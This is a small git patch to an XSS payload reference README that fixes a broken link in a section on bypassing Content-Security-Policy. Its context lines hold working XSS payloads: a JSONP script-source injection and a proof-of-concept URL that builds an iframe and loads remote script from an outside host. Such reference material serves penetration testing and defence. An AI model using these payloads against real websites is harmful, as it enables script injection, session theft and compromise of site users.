From 64e577b650efdd08752c0839545293125a298d51 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sat, 1 Sep 2018 15:38:57 +0200
Subject: [PATCH] CSP bypass fix link

---
 XSS injection/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/XSS injection/README.md b/XSS injection/README.md
index ae24bc5..da0d808 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -701,7 +701,7 @@ Exotic payloads
 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
 ```
 
-### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa
+### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
 
 Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)